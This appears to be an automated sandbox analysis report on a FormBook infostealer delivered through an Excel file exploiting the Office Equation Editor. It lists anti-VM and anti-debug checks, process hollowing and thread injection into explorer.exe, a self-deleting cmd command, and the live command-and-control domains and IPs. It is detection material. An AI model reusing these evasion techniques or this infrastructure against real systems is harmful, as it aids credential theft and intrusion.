Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000000798E4 second address: 00000000000798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000079B5E second address: 0000000000079B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2688 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1688 Thread sleep time: -54000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 2232 Thread sleep time: -55000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2193784848.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000002.2389389885.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E95465
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary, 4_2_00E95EF8
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E91000 mov eax, dword ptr fs:[00000030h] 4_2_00E91000
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A1C53 mov eax, dword ptr fs:[00000030h] 4_2_000A1C53
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A11ED mov eax, dword ptr fs:[00000030h] 4_2_000A11ED
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A1BB3 mov eax, dword ptr fs:[00000030h] 4_2_000A1BB3
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A1BF0 mov eax, dword ptr fs:[00000030h] 4_2_000A1BF0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E91000 mov eax, dword ptr fs:[00000030h] 6_2_00E91000
Source: C:\Users\Public\vbc.exe Code function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h] 6_2_008626F8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023426F8 mov eax, dword ptr fs:[00000030h] 9_2_023426F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E95465
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E9305A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E93912 SetUnhandledExceptionFilter, 4_2_00E93912
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00E996FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00E9305A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E93912 SetUnhandledExceptionFilter, 6_2_00E93912
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00E95465
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00E996FF

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 160.153.138.53 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.164.99.242 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 4F0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 4_2_00E9D0ED
Source: C:\Users\Public\vbc.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 4_2_00E9D4C3
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 4_2_00E9B8DB
Source: C:\Users\Public\vbc.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_00E9D487
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 4_2_00E9D055
Source: C:\Users\Public\vbc.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_00E9D420
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 4_2_00E9A026
Source: C:\Users\Public\vbc.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 4_2_00E96000
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 4_2_00E9D161
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00E9A165
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 4_2_00E9AD1C
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_00EA0A4C
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 4_2_00E9B615
Source: C:\Users\Public\vbc.exe Code function: _strlen,EnumSystemLocalesA, 4_2_00E9D3F7
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_00EA1BCF
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW, 4_2_00E99FA3
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 4_2_00E9B3BD
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 4_2_00E99FBC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 4_2_00E9CF3E
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 4_2_00E9D333
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 6_2_00E9D0ED
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 6_2_00E9B8DB
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 6_2_00E9D055
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 6_2_00E9A026
Source: C:\Users\Public\vbc.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 6_2_00E96000
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 6_2_00E9D161
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_00E9A165
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 6_2_00EA0A4C
Source: C:\Users\Public\vbc.exe Code function: _strlen,EnumSystemLocalesA, 6_2_00E9D3F7
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 6_2_00EA1BCF
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 6_2_00E9B3BD
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 6_2_00E9D333
Source: C:\Users\Public\vbc.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 6_2_00E9D4C3
Source: C:\Users\Public\vbc.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_00E9D487
Source: C:\Users\Public\vbc.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_00E9D420
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_00E9AD1C
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 6_2_00E9B615
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW, 6_2_00E99FA3
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 6_2_00E99FBC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 6_2_00E9CF3E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9515C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 4_2_00E9515C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00EA0DE3 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 4_2_00EA0DE3

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 323042 Sample: PI202009255687.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 44 wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu 103.141.138.87, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 32 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->78 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$PI202009255687.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Multi AV Scanner detection for dropped file 17->46 48 Machine Learning detection for dropped file 17->48 50 Maps a DLL or memory area into another process 17->50 52 Tries to detect virtualization through RDTSC time measurements 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 38 lygosfilms.info 34.102.136.180, 49168, 80 GOOGLEUS United States 23->38 40 paletciniz.com 160.153.138.53, 49169, 80 GODADDY-AMSDE United States 23->40 42 3 other IPs or domains 23->42 70 System process connects to network (likely due to code injection or exploit) 23->70 27 wscript.exe 23->27         started        signatures13 process14 signatures15 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 76 Tries to detect virtualization through RDTSC time measurements 27->76 30 cmd.exe 27->30         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
160.153.138.53
 unknown United States
21501 GODADDY-AMSDE true
104.164.99.242
 unknown United States
18779 EGIHOSTINGUS true
103.141.138.87
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true
34.102.136.180
 unknown United States
15169 GOOGLEUS true

Contacted Domains

Name IP Active
wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu 103.141.138.87 true
paletciniz.com 160.153.138.53 true
lygosfilms.info 34.102.136.180 true
www.annaothomas.com 104.164.99.242 true
www.paletciniz.com unknown unknown
www.lygosfilms.info unknown unknown